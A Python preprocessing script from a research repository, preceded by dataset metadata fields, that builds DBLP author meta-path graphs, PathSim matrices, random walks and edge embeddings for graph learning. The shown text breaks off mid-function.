hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
908c99834e622d23201dccbc97a257ea18feb1ba | 40,171 | py | Python | preprocess/dblp.py | dingdanhao110/Conch | befa022dd08590062213ef2a17d0cf697fa26ec4 | [
"MIT"
] | 8 | 2020-12-07T08:45:31.000Z | 2022-03-05T05:35:56.000Z | preprocess/dblp.py | dingdanhao110/Conch | befa022dd08590062213ef2a17d0cf697fa26ec4 | [
"MIT"
] | null | null | null | preprocess/dblp.py | dingdanhao110/Conch | befa022dd08590062213ef2a17d0cf697fa26ec4 | [
"MIT"
] | 2 | 2021-07-30T11:33:34.000Z | 2021-10-19T02:40:02.000Z | import numpy as np
import scipy.sparse as sp
import torch
import random
from sklearn.feature_extraction.text import TfidfTransformer
def clean_dblp(path='./data/dblp/',new_path='./data/dblp2/'):
label_file = "author_label"
PA_file = "PA"
PC_file = "PC"
PT_file = "PT"
PA = np.genfromtxt("{}{}.txt".format(path, PA_file),
dtype=np.int32)
PC = np.genfromtxt("{}{}.txt".format(path, PC_file),
dtype=np.int32)
PT = np.genfromtxt("{}{}.txt".format(path, PT_file),
dtype=np.int32)
labels_raw = np.genfromtxt("{}{}.txt".format(path, label_file),
dtype=np.int32)
A = {}
for i,a in enumerate(labels_raw[:,0]):
A[a]=i+1
print(len(A))
PA_new = np.asarray([[PA[i,0],A[PA[i,1]]] for i in range(PA.shape[0]) if PA[i,1] in A])
PC_new = PC
PT_new = PT
labels_new = np.asarray([[A[labels_raw[i,0]],labels_raw[i,1]] for i in range(labels_raw.shape[0]) if labels_raw[i,0] in A])
np.savetxt("{}{}.txt".format(new_path, PA_file),PA_new,fmt='%i')
np.savetxt("{}{}.txt".format(new_path, PC_file),PC_new,fmt='%i')
np.savetxt("{}{}.txt".format(new_path, PT_file),PT_new,fmt='%i')
np.savetxt("{}{}.txt".format(new_path, label_file),labels_new,fmt='%i')
def gen_homograph():
path = "data/dblp2/"
out_file = "homograph"
label_file = "author_label"
PA_file = "PA"
PC_file = "PC"
PT_file = "PT"
APA_file = "APA"
APAPA_file = "APAPA"
APCPA_file = "APCPA"
PA = np.genfromtxt("{}{}.txt".format(path, PA_file),
dtype=np.int32)
PC = np.genfromtxt("{}{}.txt".format(path, PC_file),
dtype=np.int32)
PT = np.genfromtxt("{}{}.txt".format(path, PT_file),
dtype=np.int32)
PA[:, 0] -= 1
PA[:, 1] -= 1
PC[:, 0] -= 1
PC[:, 1] -= 1
PT[:, 0] -= 1
PT[:, 1] -= 1
paper_max = max(PA[:, 0]) + 1
author_max = max(PA[:, 1]) + 1
conf_max = max(PC[:, 1]) + 1
term_max = max(PT[:, 1]) + 1
PA[:, 0] += author_max
PC[:, 0] += author_max
PC[:, 1] += author_max+paper_max
edges = np.concatenate((PA,PC),axis=0)
np.savetxt("{}{}.txt".format(path, out_file),edges,fmt='%u')
def read_embed(path="../../../data/dblp2/",
emb_file="APC",emb_len=16):
#with open("{}{}_{}.emb".format(path, emb_file,emb_len)) as f:
# n_nodes, n_feature = map(int, f.readline().strip().split())
#print("number of nodes:{}, embedding size:{}".format(n_nodes, n_feature))
#embedding = np.loadtxt("{}{}_{}.emb".format(path, emb_file,emb_len),
# dtype=np.float32, skiprows=1)
embedding = []
with open("{}{}_{}.emb".format(path, emb_file,emb_len)) as f:
n_nodes, n_feature = map(int, f.readline().strip().split())
n_nodes-=1
for line in f:
arr = line.strip().split()
if str(arr[0])[0]=='<': continue
embedding.append([ int(str(arr[0])[1:]) ]+ list(map(float,arr[1:])))
embedding = np.asarray(embedding)
print(embedding.shape)
print("number of nodes:{}, embedding size:{}".format(n_nodes, n_feature))
emb_index = {}
for i in range(n_nodes):
emb_index[embedding[i, 0]] = i
features = np.asarray([embedding[emb_index[i], 1:] if i in emb_index else embedding[0, 1:] for i in range(18405)])
#assert features.shape[1] == n_feature
#assert features.shape[0] == n_nodes
return features, n_nodes, n_feature
def dump_edge_emb(path='../data/dblp2/',emb_len=16):
# dump APA
APA_file = "APA"
APAPA_file = "APAPA"
APCPA_file = "APCPA"
APA_e,n_nodes,n_emb =read_embed(path=path,emb_file='APA',emb_len=emb_len)
APCPA_e,n_nodes,n_emb =read_embed(path=path,emb_file='APCPA',emb_len=emb_len)
PA_file = "PA"
PC_file = "PC"
PA = np.genfromtxt("{}{}.txt".format(path, PA_file),
dtype=np.int32)
PC = np.genfromtxt("{}{}.txt".format(path, PC_file),
dtype=np.int32)
PA[:, 0] -= 1
PA[:, 1] -= 1
PC[:, 0] -= 1
PC[:, 1] -= 1
PAi={}
APi={}
PCi={}
CPi={}
for i in range(PA.shape[0]):
p=PA[i,0]
a=PA[i,1]
if p not in PAi:
PAi[p]=set()
if a not in APi:
APi[a]=set()
PAi[p].add(a)
APi[a].add(p)
for i in range(PC.shape[0]):
p=PC[i,0]
c=PC[i,1]
if p not in PCi:
PCi[p]=set()
if c not in CPi:
CPi[c]=set()
PCi[p].add(c)
CPi[c].add(p)
APAi={}
APCi={}
CPAi={}
for v in APi:
for p in APi[v]:
if p not in PAi:
continue
for a in PAi[p]:
if a not in APAi:
APAi[a] ={}
if v not in APAi:
APAi[v] ={}
if v not in APAi[a]:
APAi[a][v]=set()
if a not in APAi[v]:
APAi[v][a]=set()
APAi[a][v].add(p)
APAi[v][a].add(p)
for v in APi:
for p in APi[v]:
if p not in PCi:
continue
for c in PCi[p]:
if v not in APCi:
APCi[v] ={}
if c not in CPAi:
CPAi[c] ={}
if c not in APCi[v]:
APCi[v][c]=set()
if v not in CPAi[c]:
CPAi[c][v]=set()
CPAi[c][v].add(p)
APCi[v][c].add(p)
## APAPA; vpa1pa2
#APAPA_emb = []
#for v in APAi:
# result = {}
# count = {}
# for a1 in APAi[v]:
# np1 = len(APAi[v][a1])
# edge1 = [node_emb[p] for p in APAi[v][a1]]
# edge1 = np.sum(np.vstack(edge1), axis=0) # edge1: the emd between v and a1
# for a2 in APAi[a1].keys():
# np2 = len(APAi[a1][a2])
# edge2 = [node_emb[p] for p in APAi[a1][a2]]
# edge2 = np.sum(np.vstack(edge2), axis=0) # edge2: the emd between a1 and a2
# if a2 not in result:
# result[a2] = node_emb[a2] * (np2 * np1)
# else:
# result[a2] += node_emb[a2] * (np2 * np1)
# result[a2] += edge1 * np2
# result[a2] += edge2 * np1
# if a2 not in count:
# count[a2]=0
# count[a2] += np1*np2
# for a2 in result:
# if v <= a2:
# APAPA_emb.append(np.concatenate(([v, a2], result[a2]/count[a2], [count[a2]])))
#APAPA_emb = np.asarray(APAPA_emb)
#m = np.max(APAPA_emb[:, -1])
#APAPA_emb[:, -1] /= m
#print("compute edge embeddings {} complete".format('APAPA'))
APA_ps=sp.load_npz("{}{}".format(path, 'APA_ps.npz')).todense()
APAPA_ps=sp.load_npz("{}{}".format(path, 'APAPA_ps.npz')).todense()
APCPA_ps=sp.load_npz("{}{}".format(path, 'APCPA_ps.npz')).todense()
# APA
APA = APAi
APA_emb = []
for a1 in APA.keys():
for a2 in APA[a1]:
tmp = [APA_e[p] for p in APA[a1][a2]]
tmp = np.sum(tmp, axis=0)/len(APA[a1][a2])
tmp += APA_e[a1]+APA_e[a2]
tmp /= 3
if a1 <= a2:
APA_emb.append(np.concatenate(([a1, a2], tmp,[APA_ps[a1,a2]], [len(APA[a1][a2])])))
APA_emb = np.asarray(APA_emb)
print("compute edge embeddings {} complete".format(APA_file))
# APAPA
APAPA_emb = []
ind1 = APAi
ind2 = APAi
for v in ind1:
result = {}
count = {}
for a1 in ind1[v].keys():
np1 = len(ind1[v][a1])
edge1 = [APA_e[p] for p in ind1[v][a1]]
edge1 = np.sum(np.vstack(edge1), axis=0) # edge1: the emd between v and a1
for a2 in ind2[a1].keys():
np2 = len(ind2[a1][a2])
edge2 = [APA_e[p] for p in ind2[a1][a2]]
edge2 = np.sum(np.vstack(edge2), axis=0) # edge2: the emd between a1 and a2
if a2 not in result:
result[a2] = APA_e[a1] * (np2 * np1)
else:
result[a2] += APA_e[a1] * (np2 * np1)
result[a2] += edge1 * np2
result[a2] += edge2 * np1
if a2 not in count:
count[a2]=0
count[a2] += np1*np2
for a in result:
if v <= a:
APAPA_emb.append(np.concatenate(([v, a], (result[a]/count[a]+APA_e[a]+APA_e[v])/5
,[APAPA_ps[v,a]],[count[a]])))
# f.write('{} {} '.format(v, a))
# f.write(" ".join(map(str, result[a].numpy())))
# f.write('\n')
APAPA_emb = np.asarray(APAPA_emb)
m = np.max(APAPA_emb[:, -1])
APAPA_emb[:, -1] /= m
print("compute edge embeddings {} complete".format(APAPA_file))
#APCPA
ind1 = APCi
ind2 = CPAi
APCPA_emb = []
for v in ind1:
result = {}
count = {}
if len(ind1[v]) == 0:
continue
for a1 in ind1[v].keys():
np1 = len(ind1[v][a1])
edge1 = [APCPA_e[p] for p in ind1[v][a1]]
edge1 = np.sum(np.vstack(edge1), axis=0) # edge1: the emd between v and a1
for a2 in ind2[a1].keys():
np2 = len(ind2[a1][a2])
edge2 = [APCPA_e[p] for p in ind2[a1][a2]]
edge2 = np.sum(np.vstack(edge2), axis=0) # edge2: the emd between a1 and a2
if a2 not in result:
result[a2] = APCPA_e[a1] * (np2 * np1)
else:
result[a2] += APCPA_e[a1] * (np2 * np1)
if a2 not in count:
count[a2]=0
result[a2] += edge1 * np2
result[a2] += edge2 * np1
count[a2] += np1*np2
for a in result:
if v <= a:
if APCPA_ps[v,a]==0: print(v,a)
APCPA_emb.append(np.concatenate(([v, a], (result[a]/count[a]+APCPA_e[a]+APCPA_e[v])/5,
[APCPA_ps[v,a]],
[count[a]])))
# f.write('{} {} '.format(v,a))
# f.write(" ".join(map(str, result[a].numpy())))
# f.write('\n')
APCPA_emb = np.asarray(APCPA_emb)
m = np.max(APCPA_emb[:, -1])
APCPA_emb[:, -1] /= m
print("compute edge embeddings {} complete".format(APCPA_file))
emb_len=APA_emb.shape[1]-2
np.savez("{}edge{}.npz".format(path, emb_len),
APA=APA_emb, APAPA=APAPA_emb, APCPA=APCPA_emb)
print('dump npz file {}edge{}.npz complete'.format(path, emb_len))
pass
def pathsim(A):
value = []
x,y = A.nonzero()
for i,j in zip(x,y):
value.append(2 * A[i, j] / (A[i, i] + A[j, j]))
return sp.coo_matrix((value,(x,y)))
def gen_homoadj():
path = "data/dblp2/"
PA_file = "PA"
PC_file = "PC"
PT_file = "PT"
PA = np.genfromtxt("{}{}.txt".format(path, PA_file),
dtype=np.int32)
PC = np.genfromtxt("{}{}.txt".format(path, PC_file),
dtype=np.int32)
PT = np.genfromtxt("{}{}.txt".format(path, PT_file),
dtype=np.int32)
PA[:, 0] -= 1
PA[:, 1] -= 1
PC[:, 0] -= 1
PC[:, 1] -= 1
PT[:, 0] -= 1
PT[:, 1] -= 1
paper_max = max(PA[:, 0]) + 1
author_max = max(PA[:, 1]) + 1
conf_max = max(PC[:, 1]) + 1
term_max = max(PT[:, 1]) + 1
PA = sp.coo_matrix((np.ones(PA.shape[0]), (PA[:, 0], PA[:, 1])),
shape=(paper_max, author_max),
dtype=np.float32)
PC = sp.coo_matrix((np.ones(PC.shape[0]), (PC[:, 0], PC[:, 1])),
shape=(paper_max, conf_max),
dtype=np.float32)
#PT = sp.coo_matrix((np.ones(PT.shape[0]), (PT[:, 0], PT[:, 1])),
# shape=(paper_max, term_max),
# dtype=np.int32)
APA = PA.transpose()*PA
APAPA = APA*APA
APCPA = PA.transpose()*PC * PC.transpose() * PA
APA = pathsim(APA)
APAPA = pathsim(APAPA)
APCPA = pathsim(APCPA)
sp.save_npz("{}{}".format(path, 'APA_ps.npz'), APA)
sp.save_npz("{}{}".format(path, 'APAPA_ps.npz'), APAPA)
sp.save_npz("{}{}".format(path, 'APCPA_ps.npz'), APCPA)
#APA = np.hstack([APA.nonzero()[0].reshape(-1,1), APA.nonzero()[1].reshape(-1,1)])
#APAPA = np.hstack([APAPA.nonzero()[0].reshape(-1,1), APAPA.nonzero()[1].reshape(-1,1)])
#APCPA = np.hstack([APCPA.nonzero()[0].reshape(-1,1), APCPA.nonzero()[1].reshape(-1,1)])
#np.savetxt("{}{}.txt".format(path, 'APA'),APA,fmt='%u')
#np.savetxt("{}{}.txt".format(path, 'APAPA'),APA,fmt='%u')
#np.savetxt("{}{}.txt".format(path, 'APCPA'),APA,fmt='%u')
def gen_walk(path='data/dblp2/'):
APA_file = "APA"
APAPA_file = "APAPA"
APCPA_file = "APCPA"
PA_file = "PA"
PC_file = "PC"
PA = np.genfromtxt("{}{}.txt".format(path, PA_file),
dtype=np.int32)
PC = np.genfromtxt("{}{}.txt".format(path, PC_file),
dtype=np.int32)
PA[:, 0] -= 1
PA[:, 1] -= 1
PC[:, 0] -= 1
PC[:, 1] -= 1
paper_max = max(PA[:, 0]) + 1
author_max = max(PA[:, 1]) + 1
conf_max = max(PC[:, 1]) + 1
PA[:, 0] += author_max
PC[:, 0] += author_max
PC[:, 1] += author_max+paper_max
PAi={}
APi={}
PCi={}
CPi={}
for i in range(PA.shape[0]):
p=PA[i,0]
a=PA[i,1]
if p not in PAi:
PAi[p]=set()
if a not in APi:
APi[a]=set()
PAi[p].add(a)
APi[a].add(p)
for i in range(PC.shape[0]):
p=PC[i,0]
c=PC[i,1]
if p not in PCi:
PCi[p]=set()
if c not in CPi:
CPi[c]=set()
PCi[p].add(c)
CPi[c].add(p)
APAi={}
APCi={}
CPAi={}
for v in APi:
for p in APi[v]:
if p not in PAi:
continue
for a in PAi[p]:
if a not in APAi:
APAi[a] ={}
if v not in APAi:
APAi[v] ={}
if v not in APAi[a]:
APAi[a][v]=set()
if a not in APAi[v]:
APAi[v][a]=set()
APAi[a][v].add(p)
APAi[v][a].add(p)
for v in APi:
for p in APi[v]:
if p not in PCi:
continue
for c in PCi[p]:
if v not in APCi:
APCi[v] ={}
if c not in CPAi:
CPAi[c] ={}
if c not in APCi[v]:
APCi[v][c]=set()
if v not in CPAi[c]:
CPAi[c][v]=set()
CPAi[c][v].add(p)
APCi[v][c].add(p)
#(1) number of walks per node w: 1000; TOO many
#(2) walk length l: 100;
#(3) vector dimension d: 128 (LINE: 128 for each order);
#(4) neighborhood size k: 7; --default is 5
#(5) size of negative samples: 5
#mapping of notation: a:author v:paper i:conference
l = 100
w = 1000
import random
#gen random walk for meta-path APCPA
with open("{}{}.walk".format(path,APCPA_file),mode='w') as f:
for _ in range(w):
for a in APi:
#print(a)
result="a{}".format(a)
for _ in range(int(l/4)):
p = random.sample(APi[a],1)[0]
c = random.sample(PCi[p],1)[0]
result+=" v{} i{}".format(p,c)
p = random.sample(CPi[c],1)[0]
while p not in PAi:
p = random.sample(CPi[c],1)[0]
a = random.sample(PAi[p],1)[0]
result+=" v{} a{}".format(p,a)
f.write(result+"\n")
#gen random walk for meta-path APA
with open("{}{}.walk".format(path,APA_file),mode='w') as f:
for _ in range(w):
for a in APi:
result="a{}".format(a)
for _ in range(int(l/2)):
p = random.sample(APi[a],1)[0]
a = random.sample(PAi[p],1)[0]
result+=" v{} a{}".format(p,a)
f.write(result+"\n")
##gen random walk for meta-path APAPA
#with open("{}{}.walk".format(path,APAPA_file),mode='w') as f:
# for _ in range(w):
# for a in APi:
# result="a{}".format(a)
# for _ in range(int(l/2)):
# p = random.sample(APi[a],1)[0]
# a = random.sample(PAi[p],1)[0]
# result+=" v{} a{}".format(p,a)
# f.write(result+"\n")
pass
def sparse_mx_to_torch_sparse_tensor(sparse_mx):
"""Convert a scipy sparse matrix to a torch sparse tensor."""
sparse_mx = sparse_mx.tocoo().astype(np.float32)
indices = torch.from_numpy(
np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))
values = torch.from_numpy(sparse_mx.data)
shape = torch.Size(sparse_mx.shape)
return torch.sparse.FloatTensor(indices, values, shape)
def load_edge_emb(path, schemes, n_dim=17, n_author=5000):
data = np.load("{}edge{}.npz".format(path, n_dim))
index = {}
emb = {}
for scheme in schemes:
# print('number of authors: {}'.format(n_author))
ind = sp.coo_matrix((np.arange(1, data[scheme].shape[0] + 1),
(data[scheme][:, 0], data[scheme][:, 1])),
shape=(n_author, n_author),
dtype=np.long)
# diag = ind.diagonal()
# ind = ind - diag
# ind = ind + ind.transpose() + diag
# ind = torch.LongTensor(ind)
ind = ind + ind.T.multiply(ind.T > ind)
ind = sparse_mx_to_torch_sparse_tensor(ind) # .to_dense()
embedding = np.zeros(n_dim, dtype=np.float32)
embedding = np.vstack((embedding, data[scheme][:, 2:]))
emb[scheme] = torch.from_numpy(embedding).float()
index[scheme] = ind.long()
print('loading edge embedding for {} complete, num of embeddings: {}'.format(scheme, embedding.shape[0]))
return index, emb
def gen_edge_adj(path='data/dblp2', K=80, ps=True,edge_dim=66):
"""
Args:
path:
K:
ps: use path sim, or use path count for selecting topk.
Returns:
node_neigh:
edge_idx:
edge_emb:
edge_neigh:
"""
PA_file = "PA"
PC_file = "PC"
PT_file = "PT"
# print("{}{}.txt".format(path, PA_file))
PA = np.genfromtxt("{}{}.txt".format(path, PA_file),
dtype=np.int32)
PC = np.genfromtxt("{}{}.txt".format(path, PC_file),
dtype=np.int32)
PT = np.genfromtxt("{}{}.txt".format(path, PT_file),
dtype=np.int32)
PA[:, 0] -= 1
PA[:, 1] -= 1
PC[:, 0] -= 1
PC[:, 1] -= 1
PT[:, 0] -= 1
PT[:, 1] -= 1
paper_max = max(PA[:, 0]) + 1
author_max = max(PA[:, 1]) + 1
conf_max = max(PC[:,1])+1
term_max = max(PT[:, 1]) + 1
PA = sp.coo_matrix((np.ones(PA.shape[0]), (PA[:, 0], PA[:, 1])),
shape=(paper_max, author_max),
dtype=np.int32)
PT = sp.coo_matrix((np.ones(PT.shape[0]), (PT[:, 0], PT[:, 1])),
shape=(paper_max, term_max),
dtype=np.int32)
PC = sp.coo_matrix((np.ones(PC.shape[0]), (PC[:, 0], PC[:, 1])),
shape=(paper_max, conf_max),
dtype=np.int32)
if ps:
APA_ps = sparse_mx_to_torch_sparse_tensor(sp.load_npz("{}{}".format(path, 'APA_ps.npz'))).to_dense()
APAPA_ps = sparse_mx_to_torch_sparse_tensor(sp.load_npz("{}{}".format(path, 'APAPA_ps.npz'))).to_dense()
APCPA_ps = sparse_mx_to_torch_sparse_tensor(sp.load_npz("{}{}".format(path, 'APCPA_ps.npz'))).to_dense()
adj = {'APA':APA_ps,'APAPA':APAPA_ps,'APCPA':APCPA_ps}
else:
APA = (PA.transpose() * PA)
APAPA = sparse_mx_to_torch_sparse_tensor(APA * APA).to_dense().long()
APA = sparse_mx_to_torch_sparse_tensor(APA).to_dense().long()
APCPA = sparse_mx_to_torch_sparse_tensor(PA.transpose() * PC * PC.transpose() * PA).to_dense().long()
adj = {'APA': APA, 'APAPA': APAPA, 'APCPA': APCPA}
# select top-K path-count neighbors of each A. If number of neighbors>K, trunc; else upsampling
schemes = ['APA','APAPA','APCPA']#
index, emb=load_edge_emb(path, schemes, n_dim=edge_dim, n_author=author_max)
node_neighs={}
edge_neighs={}
node2edge_idxs={}
edge_embs={}
edge2node_idxs={}
edge_node_adjs={}
for s in schemes:
print('----{}----'.format(s))
aa = adj[s]
#count nonzero degree
degree = aa.shape[1]-(aa ==0).sum(dim=1)
print('min degree ',torch.min(degree))
degree = degree.numpy()
ind = torch.argsort(aa,dim=1)
ind = torch.flip(ind,dims=[1])
node_neigh = torch.cat([ind[i, :K].view(1, -1) if degree[i] >= K
else torch.cat(
[ind[i, :degree[i]], ind[i, np.random.choice(degree[i], K - degree[i])]]).view(1, -1)
for i in range(ind.shape[0])]
, dim=0)
print("node_neigh.shape ",node_neigh.shape)
mp_index = (index[s]).to_dense()
# print(mp_index)
mp_edge = emb[s][:,:-2]
out_dims = mp_edge.shape[1]
edge_idx_old = mp_index[
torch.arange(node_neigh.shape[0]).repeat_interleave(K).view(-1),
node_neigh.contiguous().view(-1)]
print("edge_idx_old.shape ",edge_idx_old.shape)
old2new=dict()
new2old=dict()
for e in edge_idx_old.numpy():
if e not in old2new:
old2new[e]=len(old2new)
new2old[old2new[e]]=e
assert len(old2new)==len(new2old)
print('number of unique edges ', len(old2new))
new_embs = [ new2old[i] for i in range(len(old2new))]
new_embs = mp_edge[new_embs]
edge_idx = torch.LongTensor( [old2new[i] for i in edge_idx_old.numpy()]).view(-1,K)
edge_emb = new_embs
uq = torch.unique(edge_idx.view(-1),return_counts=True)[1]
print ('max number of neighbors ', max(uq))
#edge->node adj
edge_node_adj = [[]for _ in range(len(old2new))]
for i in range(edge_idx.shape[0]):
for j in range(edge_idx.shape[1]):
edge_node_adj[ edge_idx.numpy()[i,j] ].append(i)
edge_node_adj = [np.unique(i) for i in edge_node_adj]
edge_node_adj = np.array([xi if len(xi)==2 else [xi[0],xi[0]] for xi in edge_node_adj])
# print(max(map(len, edge_node_adj)))
# edge_node_adj = np.array(edge_node_adj)
print('edge_node_adj.shape ', edge_node_adj.shape)
# #edges of line graph
# line_graph_edges = torch.cat( [edge_idx.repeat_interleave(K).reshape(-1,1), edge_idx.repeat(K,1).reshape(-1,1),
# torch.arange(node_neigh.shape[0]).repeat_interleave(K*K).view(-1,1)],dim=1).numpy()
# assert line_graph_edges.shape[1]==3
# print("line_graph_edges.shape ", line_graph_edges.shape) # [edge1, edge2, node ]
# #construct line graph
# import pandas as pd
# df = pd.DataFrame(line_graph_edges)
# edge_neigh = df.groupby(0)[1,2].apply(pd.Series.tolist) #group by edge1; [ [e2,n], .. ]
# max_len = max([len(i) for i in edge_neigh ])
# edge_neigh_result=[]
# edge_idx_result=[]
# for e,neigh in enumerate(edge_neigh):
# neigh = np.asarray(neigh)
# idx = np.random.choice(neigh.shape[0], max_len)
# edge_neigh_result.append(neigh[idx,0])
# edge_idx_result.append(neigh[idx,1])
# edge_neigh = np.vstack(edge_neigh_result)
# edge2node = np.vstack(edge_idx_result)
# edge_neighs[s] = edge_neigh
node_neighs[s] = node_neigh
node2edge_idxs[s] = edge_idx
edge_embs[s] =edge_emb
# edge2node_idxs[s] = edge2node
edge_node_adjs[s] = edge_node_adj
# np.savez("{}edge_neighs_{}_{}.npz".format(path,K,out_dims),
# APA=edge_neighs['APA'], APAPA=edge_neighs['APAPA'], APCPA=edge_neighs['APCPA'])
# print('dump npz file {}edge_neighs.npz complete'.format(path))
np.savez("{}node_neighs_{}_{}.npz".format(path,K,out_dims),
APA=node_neighs['APA'], APAPA=node_neighs['APAPA'], APCPA=node_neighs['APCPA'])
print('dump npz file {}node_neighs.npz complete'.format(path))
np.savez("{}node2edge_idxs_{}_{}.npz".format(path,K,out_dims),
APA=node2edge_idxs['APA'], APAPA=node2edge_idxs['APAPA'], APCPA=node2edge_idxs['APCPA'])
print('dump npz file {}node2edge_idxs.npz complete'.format(path))
np.savez("{}edge_embs_{}_{}.npz".format(path,K,out_dims),
APA=edge_embs['APA'], APAPA=edge_embs['APAPA'], APCPA=edge_embs['APCPA'])
print('dump npz file {}edge_embs.npz complete'.format(path))
# np.savez("{}edge2node_idxs_{}_{}.npz".format(path,K,out_dims),
# APA=edge2node_idxs['APA'], APAPA=edge2node_idxs['APAPA'], APCPA=edge2node_idxs['APCPA'])
# print('dump npz file {}edge2node_idxs.npz complete'.format(path))
np.savez("{}edge_node_adjs_{}_{}.npz".format(path, K,out_dims),
APA=edge_node_adjs['APA'], APAPA=edge_node_adjs['APAPA'], APCPA=edge_node_adjs['APCPA'])
print('dump npz file {}edge_node_adjs.npz complete'.format(path))
pass
def gen_edge_adj_random(path='data/dblp2/', ps=True,edge_dim=66):
"""
Args:
path:
K:
ps: use path sim, or use path count for selecting topk.
Returns:
node_neigh:
edge_idx:
edge_emb:
edge_neigh:
"""
PA_file = "PA"
PC_file = "PC"
PT_file = "PT"
# print("{}{}.txt".format(path, PA_file))
PA = np.genfromtxt("{}{}.txt".format(path, PA_file),
dtype=np.int32)
PC = np.genfromtxt("{}{}.txt".format(path, PC_file),
dtype=np.int32)
PT = np.genfromtxt("{}{}.txt".format(path, PT_file),
dtype=np.int32)
PA[:, 0] -= 1
PA[:, 1] -= 1
PC[:, 0] -= 1
PC[:, 1] -= 1
PT[:, 0] -= 1
PT[:, 1] -= 1
paper_max = max(PA[:, 0]) + 1
author_max = max(PA[:, 1]) + 1
conf_max = max(PC[:,1])+1
term_max = max(PT[:, 1]) + 1
PA = sp.coo_matrix((np.ones(PA.shape[0]), (PA[:, 0], PA[:, 1])),
shape=(paper_max, author_max),
dtype=np.int32)
PT = sp.coo_matrix((np.ones(PT.shape[0]), (PT[:, 0], PT[:, 1])),
shape=(paper_max, term_max),
dtype=np.int32)
PC = sp.coo_matrix((np.ones(PC.shape[0]), (PC[:, 0], PC[:, 1])),
shape=(paper_max, conf_max),
dtype=np.int32)
if ps:
APA_ps = sparse_mx_to_torch_sparse_tensor(sp.load_npz("{}{}".format(path, 'APA_ps.npz'))).to_dense()
APAPA_ps = sparse_mx_to_torch_sparse_tensor(sp.load_npz("{}{}".format(path, 'APAPA_ps.npz'))).to_dense()
